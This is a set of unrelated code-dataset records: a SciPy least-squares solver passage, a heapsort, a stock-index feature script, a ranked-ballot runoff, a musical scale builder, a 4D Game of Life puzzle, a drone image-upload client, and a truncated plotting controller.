me = 0\r\n    ne = 0\r\n\r\n    # get initial solution... it might actually be right\r\n    x, nr, ur, sigma, lambdah = arls(A, b)\r\n    nx = mynorm(x)\r\n    if nx <= 0.0:\r\n        return np.zeros(n), 0, 0, 0., 0.\r\n
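\r\n    # Active-set strategy (descriptive note): each pass below finds the\r\n    # most-violated inequality in Gx>=h, promotes that row into the equality\r\n    # set Ex=f, and re-solves with arlseq(); the loop ends when every\r\n    # remaining inequality is satisfied.\r\n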
\r\n    # while constraints are not fully satisfied:\r\n    while True:\r\n        # assess state of inequalities\r\n        p = -1\r\n        mg = GG.shape[0]\r\n        rhs = GG @ x\r\n        worst = 0.0\r\n        for i in range(0, mg):\r\n            if rhs[i] < hh[i]:\r\n                diff = hh[i] - rhs[i]\r\n                if p < 0 or diff > worst:\r\n                    p = i\r\n                    worst = diff\r\n        if p < 0:\r\n            break\r\n\r\n        # delete row from GGx=hh\r\n        row = GG[p, :]\r\n        rhsp = hh[p]\r\n        GG = np.delete(GG, p, 0)\r\n        hh = np.delete(hh, p, 0)\r\n\r\n        # add row to Ex=f\r\n        if me == 0:\r\n            EE = np.zeros((1, ng))\r\n            EE[0, :] = row\r\n            ff = np.zeros(1)\r\n            ff[0] = rhsp\r\n            me = 1\r\n            ne = ng\r\n        else:\r\n            me += 1\r\n            EE = np.resize(EE, (me, ne))\r\n            EE[me - 1, :] = row[:]\r\n            ff = np.resize(ff, me)\r\n            ff[me - 1] = rhsp\r\n        # re-solve modified system\r\n        x = arlseq(A, b, EE, ff)[0]\r\n    return x, nr, ur, sigma, lambdah\r\n\r\n\r\ndef arlsnn(A, b):\r\n    \"\"\"Solves Ax = b in the least squares sense, with the solution\r\n    constrained to be non-negative.\r\n\r\n    For a nonpositive solution, use\r\n        x = -arlsnn(A,-b)\r\n\r\n    Parameters\r\n    ----------\r\n    A : (m, n) array_like \"Coefficient\" matrix, type float.\r\n    b : (m) array_like column of dependent variables, type float.\r\n\r\n    Returns\r\n    -------\r\n    x : (n) array_like column, type float.\r\n    nr : int\r\n        The numerical rank of the matrix, A.\r\n    ur : int\r\n        The usable rank of the problem, Ax=b.\r\n        Note that \"numerical rank\" is an attribute of a matrix\r\n        but the \"usable rank\" that arls computes is an attribute\r\n        of the problem, Ax=b.\r\n    sigma : float\r\n        The estimated right-hand-side root-mean-square error.\r\n    lambda : float\r\n        The estimated Tikhonov regularization.\r\n\r\n    Raises\r\n    ------\r\n    LinAlgError\r\n        If A is not 2-D.\r\n        If A is empty.\r\n        If A and b do not have the same row size.\r\n        If b has more than one column.\r\n        If SCIPY's SVD() does not converge.\r\n\r\n    Example\r\n    -------\r\n    Let A = [[2., 2., 1.],\r\n             [2., 1., 0.],\r\n             [1., 1., 0.]]\r\n    and b = [3.9, 3., 2.]\r\n    Then any least-squares solver will produce\r\n       x = [1. ,1., -0.1]\r\n    But arlsnn() produces x = [ 1.0322, 0.9093, 0.].\r\n\r\n    Arlsnn() tries to produce a small residual for the final solution,\r\n    while being biased toward making the fewest changes feasible\r\n    to the problem. Most older solvers try to minimize the residual\r\n    at the expense of extra interference with the user's model.\r\n    Arls, arlsgt, and arlsnn seek a better balance.\r\n    \"\"\"\r\n
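    # Nonnegativity is handled by delegation (descriptive note): with\r\n    # G = I and h = 0, every bound x[i] >= 0 becomes one inequality row\r\n    # for arlsgt() above.\r\n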
    A = atleast_2d(_asarray_validated(A, check_finite=True))\r\n    b = atleast_1d(_asarray_validated(b, check_finite=True))\r\n    if np.count_nonzero(A) == 0 or np.count_nonzero(b) == 0:\r\n        return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n    checkAb(A, b, 1)\r\n    n = A.shape[1]\r\n    G = np.eye(n)\r\n    h = np.zeros(n)\r\n    return arlsgt(A, b, G, h)\r\n","sub_path":"scipy/linalg/arls.py","file_name":"arls.py","file_ext":"py","file_size_in_byte":30672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}{"seq_id":"75991122","text":"#heapify function\ndef heapify(arr, n, i):\n    largest = i # Initialize largest as root\n    l = 2 * i + 1 # left = 2*i + 1\n    r = 2 * i + 2 # right = 2*i + 2\n    \n    # See if left child of root exists and if greater than root\n    if l < n and arr[1][i] < arr[1][l]:\n        largest = l\n    \n    # See if right child of root exists and if greater than root\n    if r < n and arr[1][largest] < arr[1][r]:\n        largest = r\n    \n    # Change root, if needed\n    if largest != i:\n        arr[1][i],arr[1][largest] = arr[1][largest],arr[1][i] # swap output values\n        arr[0][i],arr[0][largest] = arr[0][largest],arr[0][i] # swap input values\n        # Heapify the root.\n        heapify(arr, n, largest)\n    \n#heapsort function\ndef heapSort(arr):\n    n = len(arr[1])\n    \n    # Build a maxheap.\n    # Since last parent will be at ((n//2)-1) we can start at that location.\n    for i in range(n // 2 - 1, -1, -1):\n        heapify(arr, n, i)\n    \n    # One by one extract elements\n    for i in range(n-1, 0, -1):\n        arr[1][i], arr[1][0] = arr[1][0], arr[1][i] # swap output values\n        arr[0][i], arr[0][0] = arr[0][0], arr[0][i] # swap input values\n        heapify(arr, i, 0)\n","sub_path":"BadHash40/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}{"seq_id":"118455940","text":"from sklearn.linear_model import LinearRegression # method that uses mean squared error\nimport joblib\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport win32com.client\nimport os\nimport numpy as np\n\n\nmove_num = [5,20,60,120]\n\nobjCpCybos = win32com.client.Dispatch(\"CpUtil.CpCybos\")\nbConnect = objCpCybos.IsConnect\nif (bConnect == 0):\n    print(\"PLUS is not connected properly.\")\n    exit()\n
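\n# (Illustrative sketch, not in the original script: one could poll briefly for\n# the PLUS connection instead of exiting at once; `time` would have to be\n# imported at the top for this to run.)\n# for _ in range(5):\n#     if objCpCybos.IsConnect:\n#         break\n#     time.sleep(2)\n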
\n#Stock_code = ['075970','005930','052460']\n#Stock_name = [\"동국알앤에스\",\"삼성전자\",\"아이크래프트\"]\nStock_code = ['075970']\nStock_name = [\"동국알앤에스\"]\n\n\nfor x,j in enumerate(Stock_code):\n    objStockChart = win32com.client.Dispatch(\"CpSysDib.StockChart\")\n    objStockChart.SetInputValue(0, \"A\" + j) \n    objStockChart.SetInputValue(1, ord('2')) # query by count\n    objStockChart.SetInputValue(4, 25) # 381 bars per day, 0900 ~ 1520\n    objStockChart.SetInputValue(5, [0,1,2,3,4,5,8,9]) # date, time, open, high, low, close, change vs previous day, volume, trading value\n    objStockChart.SetInputValue(6, ord('m')) # chart price - daily chart request\n    objStockChart.SetInputValue(7, 3)\n    objStockChart.SetInputValue(9, ord('1')) # use adjusted prices\n    objStockChart.BlockRequest()\n\n    \n    leng = objStockChart.GetHeaderValue(3)\n\n    day_list = []\n    time_list = []\n    open_list = []\n    high_list = []\n    low_list = []\n    close_list = []\n    compare_list = []\n    vol_list = []\n    amount_list = []\n    \n    day_list.append(objStockChart.GetDataValue(0, 20))\n    time_list.append(objStockChart.GetDataValue(1, 20))\n    open_list.append(objStockChart.GetDataValue(2, 20))\n    high_list.append(objStockChart.GetDataValue(3, 20))\n    low_list.append(objStockChart.GetDataValue(4, 20))\n    close_list.append(objStockChart.GetDataValue(5, 20))\n    vol_list.append(objStockChart.GetDataValue(6, 20))\n    amount_list.append(objStockChart.GetDataValue(7, 20))\n    dict2 = {'day' : day_list, 'time' : time_list}\n    dict1 = {'open' : open_list, 'high' : high_list, 'low' : low_list, \\\n             'close' : close_list,'vol' : vol_list, 'amount' : amount_list}\n\n\n    df = pd.DataFrame(dict1, columns=['open','high','low','close','vol','amount'])\n    df2 = pd.DataFrame(dict2, columns=['day','time'])\n    df = df.sort_index(ascending=False) # sort_index returns a new frame, so assign it back\n    print(df)\n    print(df2)\n\n    # query the KOSDAQ index\n\n    kda_open,kda_high,kda_low,kda_close,kda_vol,kda_close_move,kda_vol_move,price_moving_tmp, vol_moving_tmp = [],[],[],[],[],[],[],[],[]\n\n    objStockChart.SetInputValue(0, 'U201') \n    objStockChart.SetInputValue(1, ord('2')) # query by count\n    objStockChart.SetInputValue(4, 120) # 381 bars per day, 0900 ~ 1520\n    objStockChart.SetInputValue(5, [0,1,2,3,4,5,8,9]) # date, time, open, high, low, close, change vs previous day, volume, trading value\n    objStockChart.SetInputValue(6, ord('m')) # chart price - daily chart request\n    objStockChart.SetInputValue(7, 3)\n    objStockChart.SetInputValue(9, ord('1')) # use adjusted prices\n    objStockChart.BlockRequest()\n\n    \n    kda_open.append(objStockChart.GetDataValue(2, 0))\n    kda_high.append(objStockChart.GetDataValue(3, 0))\n    kda_low.append(objStockChart.GetDataValue(4, 0))\n    kda_close.append(objStockChart.GetDataValue(5, 20))\n    kda_vol.append(objStockChart.GetDataValue(6, 20)/1000)\n\n    for j in move_num:\n        for i in range(j):\n            kda_close_move.append(objStockChart.GetDataValue(5, i))\n            kda_vol_move.append(objStockChart.GetDataValue(6, i)/1000)\n\n        kda_close_numpy = np.array(kda_close_move)\n        kda_vol_numpy = np.array(kda_vol_move)\n        price_moving_tmp += int(np.mean(kda_close_numpy)),\n        vol_moving_tmp += int(np.mean(kda_vol_numpy)),\n        \n        kda_close_move, kda_vol_move= [], []\n\n    # feature_list = ['price_5_moving','price_20_moving','price_60_moving','price_120_moving','amount_5_moving','amount_20_moving','amount_60_moving','amount_120_moving']\n    # tmp_list = price_moving_tmp + amount_moving_tmp\n    feature_list = ['kda_vol_5_moving','kda_vol_20_moving','kda_vol_60_moving','kda_vol_120_moving']\n    tmp_list = vol_moving_tmp\n\n    name_list1 = ['kda_open','kda_high','kda_low','kda_close','kda_vol']\n    value_list1 = [kda_open,kda_high,kda_low,kda_close,kda_vol]\n\n\n    for x,i in enumerate(tmp_list):\n        value_list1 += i,\n        name_list1 += '{}'.format(feature_list[x]),\n\n\n    # query the KOSPI index
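\n    # (Sketch, not in the original: the per-window means used above and below\n    # could be vectorized instead of accumulated in loops, e.g.\n    #   closes = np.array([objStockChart.GetDataValue(5, i) for i in range(120)])\n    #   price_moving = [int(closes[:w].mean()) for w in move_num]\n    # which computes the same leading-window averages.)\n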
\n\n    ksi_open,ksi_high,ksi_low,ksi_close,ksi_vol,ksi_close_move,ksi_vol_move,price_moving_tmp, vol_moving_tmp = [],[],[],[],[],[],[],[],[]\n\n    objStockChart.SetInputValue(0, 'U001') \n    objStockChart.SetInputValue(1, ord('2')) # query by count\n    objStockChart.SetInputValue(4, 120) # 381 bars per day, 0900 ~ 1520\n    objStockChart.SetInputValue(5, [0,1,2,3,4,5,8,9]) # date, time, open, high, low, close, change vs previous day, volume, trading value\n    objStockChart.SetInputValue(6, ord('m')) # chart price\n    objStockChart.SetInputValue(7, 3)\n    objStockChart.SetInputValue(9, ord('1')) # use adjusted prices\n    objStockChart.BlockRequest()\n\n    \n    ksi_open.append(objStockChart.GetDataValue(2, 0))\n    ksi_high.append(objStockChart.GetDataValue(3, 0))\n    ksi_low.append(objStockChart.GetDataValue(4, 0))\n    ksi_close.append(objStockChart.GetDataValue(5, 0))\n    ksi_vol.append(objStockChart.GetDataValue(6, 0)/1000)\n\n    for j in move_num:\n        for i in range(j):\n            ksi_close_move.append(objStockChart.GetDataValue(5, i))\n            ksi_vol_move.append(objStockChart.GetDataValue(6, i)/1000)\n        \n\n\n        ksi_close_numpy = np.array(ksi_close_move)\n        ksi_vol_numpy = np.array(ksi_vol_move)\n        price_moving_tmp += int(np.mean(ksi_close_numpy)),\n        vol_moving_tmp += int(np.mean(ksi_vol_numpy)),\n        \n        ksi_close_move, ksi_vol_move= [], []\n\n\n\n    # feature_list = ['price_5_moving','price_20_moving','price_60_moving','price_120_moving','vol_5_moving','vol_20_moving','vol_60_moving','vol_120_moving']\n    # tmp_list = price_moving_tmp + vol_moving_tmp\n    feature_list = ['ksi_vol_5_moving','ksi_vol_20_moving','ksi_vol_60_moving','ksi_vol_120_moving']\n    tmp_list = vol_moving_tmp\n\n\n    name_list2 = ['ksi_open','ksi_high','ksi_low','ksi_close','ksi_vol']\n    value_list2 = [ksi_open,ksi_high,ksi_low,ksi_close,ksi_vol]\n\n\n    for x,i in enumerate(tmp_list):\n        value_list2 += i,\n        name_list2 += '{}'.format(feature_list[x]),\n\n\n    # combine the KOSPI and KOSDAQ features \n\n    name_list = name_list1 + name_list2\n    value_list = value_list1 + value_list2\n\n    print(len(name_list))\n    print(len(value_list))\n\n    # add the features to df \n\n    for x,i in enumerate(value_list):\n        df['{}'.format(name_list[x])] = i\n    \n    print(df)\n\n    test_model = joblib.load('testdata.pkl')\n    y_predict = test_model.predict(df)\n    print(y_predict)\n\n\n\n\n# compare_data = pd.read_excel('동국알앤에스_test_Data.xlsx')\n# compare_data.drop(['compare','day','time'], axis=1, inplace=True)\n\n\n# test_model = joblib.load('testdata.pkl')\n\n# y_compare_predict = test_model.predict(compare_data.iloc[0])\n\n# print(y_compare_predict)\n","sub_path":"AutoTrade/test_deleteme.py","file_name":"test_deleteme.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}{"seq_id":"171794108","text":"# not sure what exact formula is wanted, i am going to use exhaustive ballot\n
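\n# Exhaustive-ballot runoff, as implemented below: count each voter's top\n# remaining choice; a candidate with a strict majority wins; otherwise the\n# lowest-scoring candidate(s) are eliminated from every ballot and the count\n# repeats, until someone wins or all candidates are eliminated (a tie).\n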
\n# getting an input number that is actually an integer\ndef inputNumber(message):\n    while True:\n        try:\n            userInput = int(input(message)) \n        except ValueError:\n            print(\"Not an integer! Try again.\")\n            continue\n        else:\n            return (userInput)\n\n# getting a valid vote\ndef getValidChoice(choiceNumber,prevVotes):\n    valid = False\n    while valid == False:\n        vote = input(\"Vote #\"+str(choiceNumber)+\": \")\n        for p in candidateList:\n            if vote == p:\n                valid = True\n                for z in prevVotes:\n                    if vote != z:\n                        pass\n                    else:\n                        print(\"You have already voted for them.\")\n                        valid = False\n                        break    \n        if valid == False:\n            print(\"Invalid, try again\")\n    return(vote)\n\n# getting the candidates into a dictionary, in which they can be scored\ncandidates = {}\nnumOfCandidates = inputNumber(\"Enter the number of candidates: \")\nfor i in range(0,numOfCandidates):\n    candidate = input(\"Input name of the candidate: \")\n    candidates[candidate] = 0\n\n# getting the number of voters\nnumOfVoters = inputNumber(\"Enter the number of voters: \")\nprint()\nvotes = []\n\n# get the votes\ncandidateList = list(candidates.keys())\nfor i in range(0,numOfVoters):\n    votes.append([])\n    for p in range(0,numOfCandidates):\n        votes[i].append(getValidChoice(p+1, votes[i]))\n    print()\n\nwinner = ''\nwinnerFound = False\n\nwhile True:\n\n    # getting rid of all that are elim'd\n    candidateList = list(candidates.keys())\n\n    # setting score = to 0\n    for i in range(0,len(candidates)):\n        candidates[candidateList[i]] = 0\n\n    # getting the top votes and setting the candidates score\n    for i in range(0,len(votes)):\n        candidates[votes[i][0]] += 1\n\n    # seeing if someone has more than 50 percent\n    for candidate in candidateList:\n        if candidates[candidate] > numOfVoters / 2:\n            winnerFound = True\n            winner = candidate\n\n    # break once a winner is found\n    if winnerFound:\n        print(\"Winner:\", winner)\n        break\n\n    # getting the biggest loser\n    losers = []\n    loserScore = -1\n    for i in range(0,len(candidates)):\n        if loserScore == -1:\n            losers = []\n            losers.append(candidateList[i])\n            loserScore = candidates[candidateList[i]]\n        elif candidates[candidateList[i]] < loserScore:\n            losers = []\n            losers.append(candidateList[i])\n            loserScore = candidates[candidateList[i]]\n        elif candidates[candidateList[i]] == loserScore:\n            losers.append(candidateList[i])\n            loserScore = candidates[candidateList[i]]\n\n    # deleting the biggest loser(s)\n    for loser in losers:\n        for i in range(0,len(votes)):\n            votes[i].remove(loser)\n        del candidates[loser]\n\n    if len(candidates) == 0:\n        print(\"It was a tie\")\n        break","sub_path":"lesson-3/problem-set/runoff.py","file_name":"runoff.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}{"seq_id":"293718903","text":"#!/usr/bin/python\n\nfrom enum import Enum\n\n# each number represents the pitch for the note\n\nclass Notes(Enum):\n    __order__ = 'A B C D E F G'\n    A = 0;\n    B = 2;\n    C = 3;\n    D = 5;\n    E = 7;\n    F = 8;\n    G = 10;\n\norderedNotes = list(Notes)\n\nnotes = {\n    \"A*\" : 11,\n    \"A\" : 0,\n    \"A#\" : 1,\n\n    \"B*\" : 1,\n    \"B\" : 2,\n    \"B#\" : 3,\n\n    \"C*\" : 2,\n    \"C\" : 3,\n    \"C#\" : 4,\n\n    \"D*\" : 4,\n    \"D\" : 5,\n    \"D#\" : 6,\n\n    \"E*\" : 6,\n    \"E\" : 7,\n    \"E#\" : 8,\n\n    \"F*\" : 7,\n    \"F\" : 8,\n    \"F#\" : 9,\n\n    \"G*\" : 9,\n    \"G\" : 10,\n    \"G#\" : 11\n}\n\n# going up full steps and half steps on semitones\n\ndef fullstep(pitch):\n    return (pitch + 2)%12\n\ndef halfstep(pitch):\n    return (pitch + 1)%12\n\n#interval patterns shown as arrays\n\nMajor = ['f','f','h','f','f','f','h']\n
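\n# Other interval patterns follow the same scheme; for example a natural-minor\n# pattern (illustrative, not part of the original file) would be:\n# Minor = ['f','h','f','f','h','f','f']\n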
\n#Given a note and interval pattern, gives you all the semitones\n\ndef NotesInKey(note,KeyType):\n    result = notes.get(note)\n    results = [result]\n    print(result)\n    for x in KeyType:\n        if x == 'f':\n            result = fullstep(result)\n        elif x == 'h':\n            result = halfstep(result)\n        results.append(result)\n    return results\n\n\ndef getToneFromNote():\n    #notesList = list(Notes)\n    for i in range(0,3):\n        print(orderedNotes[i]) # the notes dict is keyed by strings; orderedNotes holds the enum members\n\nvar = NotesInKey(\"A\", Major)\n\nprint(var)\n","sub_path":"chord_builder_deluxe.py","file_name":"chord_builder_deluxe.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}{"seq_id":"412264773","text":"import sys\n\nACTIVE, INACTIVE = '#.'\n\nwith open(sys.argv[1]) as file:\n    initial_state = {\n        (i, j, 0, 0)\n        for i, row in enumerate(file)\n        for j, val in enumerate(row)\n        if val == ACTIVE\n    }\n\ndef neighbors(cube):\n    i, j, k, h = cube\n    return {\n        (i+di, j+dj, k+dk, h+dh)\n        for di in (-1, 0, 1)\n        for dj in (-1, 0, 1)\n        for dk in (-1, 0, 1)\n        for dh in (-1, 0, 1)\n        if di != 0 or dj != 0 or dk != 0 or dh != 0\n    }\n\ndef num_active_neighbors(cube, active_cubes):\n    return sum(\n        neighbor in active_cubes\n        for neighbor in neighbors(cube)\n    )\n\nactive_cubes = initial_state.copy()\n\nfor cycle in range(6):\n    inactive_cubes_of_interest = (\n        set.union(*map(neighbors, active_cubes))\n        - active_cubes\n    )\n    activated_cubes = {\n        cube\n        for cube in inactive_cubes_of_interest\n        if num_active_neighbors(cube, active_cubes) == 3\n    }\n    deactivated_cubes = {\n        cube\n        for cube in active_cubes\n        if num_active_neighbors(cube, active_cubes) not in (2, 3)\n    }\n    active_cubes |= activated_cubes\n    active_cubes -= deactivated_cubes\n\nprint(len(active_cubes))\n\n","sub_path":"day-17/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}{"seq_id":"391309359","text":"#!/usr/bin/python\nimport socket\nimport cv2\nimport numpy\nimport json\n\n\nclass DRONE_Client:\n    def __init__(self, TCP_IP=None, TCP_PORT=None):\n        # create a socket and connect to the server\n        self.TCP_IP = TCP_IP\n        self.sock = socket.socket()\n        self.sock.connect((self.TCP_IP, TCP_PORT))\n        print('connecting')\n\n\n\n    # check whether the whole map came into frame\n    def fullMapChecker(self, img):\n        # 1st: extract the demo-board region - run findContours and take the largest rectangle -> remove the skew\n        imgray = cv2.GaussianBlur(img, (5, 5), 0)\n        imgray = cv2.cvtColor(imgray, cv2.COLOR_BGR2GRAY)\n        canny = cv2.Canny(imgray, 100, 200)\n        contours, hierarchy = cv2.findContours(canny, cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n        sorted_list = sorted(contours, key=lambda cc: len(cc))\n\n        # 2nd: from the area of the tilted largest rectangle \"sorted_list[-1]\", check whether a proper map came in - decide whether to send it to the server\n        maxHull = cv2.convexHull(sorted_list[-1])\n        x, y, w, h = cv2.boundingRect(maxHull)\n        Cx, Cy = x + w/2, y + h/2\n        area = w*h\n        full_area = img.shape[0]*img.shape[1]\n        #print(area/full_area)\n        if img.shape[1]/2 - 100 < Cx < img.shape[1]/2 + 100 and img.shape[0]/2 - 100 < Cy < img.shape[0]/2 + 100:\n            if 0.45 > area / full_area > 0.447:\n                cv2.drawContours(img, [maxHull], 0, (0, 1, 9), 2)\n                cv2.imwrite(\"./container/{}.jpg\".format(str(area / full_area)), cv2.resize(img, (800, 600)))\n                return True\n        else:\n            return False\n\n\n    def sendToServer(self, img, lct):\n\n\n\n        # 1st: socket comm - convert (encode) the extracted image into a string\n        encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]\n        result, imgencode = cv2.imencode('.jpg', img, encode_param)\n        data = numpy.array(imgencode)\n        stringData = data.tostring()\n\n        # 2nd: socket comm - append the object position to the payload\n        obj_x, obj_y = lct[0], lct[1]\n        spot = \"\\n\\b\\n\\b{}:{}\".format(str(obj_x), str(obj_y))\n        stringData += spot.encode()\n
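\n        # Protocol note: the 16-byte, left-justified length header sent below\n        # lets the receiving side read exactly len(stringData) payload bytes;\n        # the \"\\n\\b\\n\\b\" marker inside the payload separates the JPEG bytes\n        # from the appended \"x:y\" location suffix.\n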
        self.sock.send(str(len(stringData)).encode().ljust(16))\n        self.sock.send(stringData)\n        # self.sock.close()  # ... wondering if closing the socket here was what kept dropping the connection ...\n\n    def sockWaitAnswer(self):\n        data = self.sock.recv(1024)\n        data = data.decode('utf-8')\n        return data\n\n    def sockClose(self):\n        self.sock.close()\n\n\n\nif __name__ =='__main__':\n    drone_client = DRONE_Client()\n    img = cv2.imread(\"./container/origin.jpg\")\n    drone_client.fullMapChecker(img)\n","sub_path":"drone/DRONE_Client.py","file_name":"DRONE_Client.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"120231310","text":"import numpy as np\nfrom matplotlib.backend_bases import MouseButton\nfrom system.utils.performance import find_closest_point, check_pareto\nfrom .view import VizSpaceView\n\n\nclass VizSpaceController:\n\n    def __init__(self, root_controller):\n        self.root_controller = root_controller\n        self.root_view = self.root_controller.view\n\n        # set values from root\n        self.config, self.problem_cfg = self.root_controller.config, self.root_controller.problem_cfg\n        self.agent = self.root_controller.agent\n\n        self.view = VizSpaceView(self.root_view, self.problem_cfg)\n\n        # bind command of viewing history to scaler\n        self.max_iter = 0\n        self.view.scale_iter.configure(command=self.redraw)\n\n        # calculate pfront limit (for rescale plot afterwards)\n        self.pfront_limit = None\n        true_pfront = self.root_controller.true_pfront\n        if true_pfront is not None:\n            self.pfront_limit = [np.min(true_pfront, axis=1), np.max(true_pfront, axis=1)]\n\n        # initialize performance space\n        scatter_list = []\n        if true_pfront is not None:\n            scatter_pfront = self.view.ax1.scatter(*true_pfront.T, color='gray', s=5, label='Oracle') # plot true pareto front\n            scatter_list.append(scatter_pfront)\n        self.scatter_x = None\n        self.scatter_y = self.view.ax1.scatter([], [], color='blue', s=10, label='Evaluated')\n        self.scatter_y_pareto = self.view.ax1.scatter([], [], color='red', s=10, label='Pareto front')\n        self.scatter_y_new = self.view.ax1.scatter([], [], color='m', s=10, label='New evaluated')\n        self.scatter_y_pred = self.view.ax1.scatter([], [], facecolors=(0, 0, 0, 0), edgecolors='m', s=15, label='New predicted')\n        scatter_list.extend([self.scatter_y, self.scatter_y_pareto, self.scatter_y_new, self.scatter_y_pred])\n        self.scatter_selected = None\n        self.line_y_pred_list = []\n\n        # support checking design variables\n        self.line_x = None\n        self.fill_x = None\n        self.bar_x = None\n        self.text_x = []\n        self.view.fig.canvas.mpl_connect('button_press_event', self.check_design_values)\n\n        # set pick event on legend to enable/disable certain visualization\n        legend = self.view.fig.legend(loc='lower center', ncol=5, frameon=False)\n        self.picker_map = {}\n        for plot_obj, leg_obj, text in zip(scatter_list, legend.legendHandles, legend.get_texts()):\n            leg_obj.set_picker(True)\n            text.set_picker(True)\n            self.picker_map[leg_obj] = plot_obj\n            self.picker_map[text] = plot_obj\n        self.view.fig.canvas.mpl_connect('pick_event', self.toggle_performance_visibility)\n\n        # refresh figure\n        self.view.fig.subplots_adjust(bottom=0.15)\n        self.redraw_performance_space(reset_scaler=True)\n\n    def set_config(self, config=None):\n        if config is not None:\n            self.config = config\n\n    def redraw(self, val):\n        '''\n        Redraw design and performance space when slider changes\n        '''\n        # get current iteration from slider value\n        curr_iter = int(val)\n\n        # clear design space\n        self.clear_design_space()\n\n        # replot 
performance space\n self.redraw_performance_space(curr_iter)\n\n def check_design_values(self, event):\n '''\n Mouse clicking event, for checking design values\n '''\n if event.inaxes != self.view.ax1: return\n\n if event.button == MouseButton.LEFT and event.dblclick: # check certain design values\n n_var, n_obj = self.problem_cfg['n_var'], self.problem_cfg['n_obj']\n var_type, var_name = self.problem_cfg['type'], self.problem_cfg['var_name']\n var_lb, var_ub = self.view.var_lb, self.view.var_ub\n\n # find nearest performance values with associated design values\n loc = [event.xdata, event.ydata]\n all_y = self.scatter_y._offsets\n closest_y, closest_idx = find_closest_point(loc, all_y, return_index=True)\n closest_x = self.scatter_x[closest_idx]\n if n_obj == 3:\n closest_y = np.array(self.scatter_y._offsets3d).T[closest_idx]\n\n # clear checked design values\n self.clear_design_space()\n\n # highlight selected point\n self.scatter_selected = self.view.ax1.scatter(*closest_y, s=50, facecolors=(0, 0, 0, 0), edgecolors='g', linewidths=2)\n\n # compute normalized x\n if var_type in ['continuous', 'integer', 'binary']:\n normalized_x = (np.array(closest_x) - var_lb) / (var_ub - var_lb)\n elif var_type == 'categorical':\n normalized_x = []\n if 'var' in self.problem_cfg:\n for i, (x, var_info) in enumerate(zip(closest_x, self.problem_cfg['var'].values())):\n normalized_x.append((var_info['choices'].index(x) + 1) / var_ub[i])\n else:\n for i, x in enumerate(closest_x):\n normalized_x.append((self.problem_cfg['var_choices'].index(x) + 1) / var_ub[i])\n normalized_x = np.array(normalized_x)\n elif var_type == 'mixed':\n normalized_x = []\n var_type_list = []\n for i, (x, var_info) in enumerate(zip(closest_x, self.problem_cfg['var'].values())):\n var_type_list.append(var_info['type'])\n if var_info['type'] in ['continuous', 'integer']:\n lb, ub = var_info['lb'], var_info['ub']\n normalized_x.append((x - lb) / (ub - lb))\n elif var_info['type'] == 'binary':\n normalized_x.append(x)\n elif var_info['type'] == 'categorical':\n normalized_x.append((var_info['choices'].index(x) + 1) / var_ub[i])\n else:\n raise Exception(f'invalid variable type {var_info[\"type\"]}')\n normalized_x = np.array(normalized_x)\n else:\n raise Exception(f'invalid problem type {var_type}')\n\n # compute text label\n closest_x_str = []\n for i in range(n_var):\n if var_type == 'continuous':\n closest_x_str.append(f'{closest_x[i]:.4g}')\n elif var_type in ['integer', 'binary', 'categorical']:\n closest_x_str.append(f'{closest_x[i]}')\n elif var_type == 'mixed':\n if var_type_list[i] == 'continuous':\n closest_x_str.append(f'{closest_x[i]:.4g}')\n else:\n closest_x_str.append(f'{closest_x[i]}')\n else:\n raise Exception(f'invalid problem type {var_type}')\n \n # plot checked design values as radar plot or bar chart\n if n_var > 2:\n self.line_x = self.view.ax2.plot(self.view.theta, normalized_x, color='g')[0]\n self.fill_x = self.view.ax2.fill(self.view.theta, normalized_x, color='g', alpha=0.2)[0]\n self.view.ax2.set_varlabels([f'{var_name[i]}\\n{closest_x_str[i]}' for i in range(n_var)])\n else:\n self.bar_x = self.view.ax2.bar(self.view.xticks, normalized_x, color='g')\n self.text_x = []\n for i in range(n_var):\n if var_type in ['continuous', 'integer'] or (var_type == 'mixed' and var_type_list[i] in ['continuous', 'integer']):\n self.view.text_lb[i].set_text(str(var_lb[i]))\n self.view.text_ub[i].set_text(str(var_ub[i]))\n text = self.view.ax2.text(self.view.xticks[i], normalized_x[i], f'{closest_x_str[i]}', 
horizontalalignment='center', verticalalignment='bottom')\n self.text_x.append(text)\n\n elif event.button == MouseButton.RIGHT: # clear checked design values\n self.clear_design_space()\n \n self.view.fig.canvas.draw()\n\n def clear_design_space(self):\n '''\n Clear design space plot\n '''\n if self.scatter_selected is not None:\n self.scatter_selected.remove()\n self.scatter_selected = None\n \n n_var, var_name = self.problem_cfg['n_var'], self.problem_cfg['var_name']\n\n if n_var > 2:\n self.view.ax2.set_varlabels(var_name)\n if self.line_x is not None:\n self.line_x.remove()\n self.line_x = None\n if self.fill_x is not None:\n self.fill_x.remove()\n self.fill_x = None\n else:\n if self.bar_x is not None:\n self.bar_x.remove()\n self.bar_x = None\n for text in self.text_x:\n text.remove()\n self.text_x = []\n\n def redraw_performance_space(self, draw_iter=None, reset_scaler=False):\n '''\n Redraw performance space\n '''\n # load data\n X, Y, Y_expected, pareto, batch = self.agent.load(['X', 'Y', 'Y_expected', 'pareto', 'batch'])\n valid_idx = np.where((~np.isnan(Y)).all(axis=1))[0]\n if len(valid_idx) == 0: return\n X, Y, Y_expected, pareto, batch = X[valid_idx], Y[valid_idx], Y_expected[valid_idx], pareto[valid_idx], batch[valid_idx]\n max_iter = batch[-1]\n\n if reset_scaler:\n # reset the max iteration of scaler\n self.view.scale_iter.configure(to=max_iter)\n if self.view.curr_iter.get() >= self.max_iter:\n self.max_iter = max_iter\n self.view.curr_iter.set(max_iter)\n else:\n # no need to redraw performance space if not focusing on the 